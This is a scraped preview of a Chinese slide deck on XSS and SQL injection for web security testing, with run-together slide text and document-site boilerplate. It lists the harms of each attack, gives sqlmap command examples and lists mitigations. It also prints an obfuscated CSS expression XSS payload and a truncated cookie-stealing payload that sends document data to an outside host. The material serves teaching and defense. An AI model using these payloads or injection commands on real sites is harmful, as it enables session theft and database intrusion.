XSS跨站攻击及SQL注入ppt课件.pptxVIP

  1. 1、本文档共21页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

Web安全性测试安全性测试手段SQL注入漏洞(工具:SqlMap)XSS跨站攻击漏洞CSRF跨站请求伪造DDOS分布式拒绝服务钓鱼点击劫持跨站脚本漏洞,SQL注入原理跨站脚本漏洞分类跨站脚本漏洞及案列漏洞解决方案漏洞的危害SQL注入漏洞数据库信息泄漏:数据库中存储的用户隐私信息泄露。网页篡改:通过操作数据库对特定网页进行篡改。网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。服务器被远程控制,被安装后门:经由数据库服务器提供的/Article/48/Article_048_1.htm操作系统支持,让黑客得以修改或控制操作系统。XSS跨站脚本漏洞钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入,甚至发起基于DHTML更高级的钓鱼攻击方式。网站挂马:跨站后利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。身份盗用:Cookie是用户对于特定网站的身份验证标志,/Article/html/3/7/Article_007_1.htmXSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。如果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份时,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。/Article/html/3/7/Article_007_1.htmXSS蠕虫:/Article/html/3/7/Article_007_1.htmXSS?蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施/Article/60/sort096/Article_096_1.htmDDoS攻击等。SqlMap使用常见注入类型 get型: sqlmap–uhttp://xxx.xx.xxx/xx.jsp?id=xxhttp://xxx.xx.xxx/xx.jsp?id=xx post型: sqlmap–uhttp://xxx.xx.xxx/xx.jsphttp://xxx.xx.xxx/xx.jsp--methodPOST--data“xx=1xx=1”V1 cookie型: sqlmap–uhttp://xxx.xx.xxx/xx.phphttp://xxx.xx.xxx/xx.php--cookie“COOKIE_VALUE”V1或–cookie“PHPSESSID=XXXXXX;security=low”分号分开SQL注入漏洞解决方案输入验证错误消息处理加密处理存储过程来执行所有的查询使用专业的漏洞扫描工具禁止对重要表的Drop、Insert、Update、DeleteSQL注入漏洞解决方案对所有来自用户输入的数据进行严格检查、对数据库配置实用最小权限原则所有查询语句都实用库提供的参数化查询接口,参数化的语句实用参数而不是将用户输入变量嵌入到SQL语句中对进入数据库的特殊字符(“”--;等)进行转义处理或编码转换数据长度严格规定,能防止比较长的SQL注入语句无法正确执行数据层编码统一避免显示SQL错误信息,如类型、字段什么是XSSCrosssitescripting简称XSS原理:利用网站的漏洞向网站的页面注入JAVASCRIPT等脚本内容。根源:程序的输入、输出没有考虑安全因素XSSCheatSheet/xss.html/xss.html了解不痛浏览器和各种特殊的HTML标签如何执行脚本XSS需要使用的关键字 “:!--XSS={()}各类伪协议头: Javascript:vbscript:CSS样式表脚本注入 Style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,1235)))盗取用户cookie信息嵌入恶意代码XMLID=I X C![CDATA[imgsrc=javas]]![CDATA[cript:xx=newImage();xx.src=39/pic/163.asp?url=+escape(document.

文档评论(0)

8d758 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档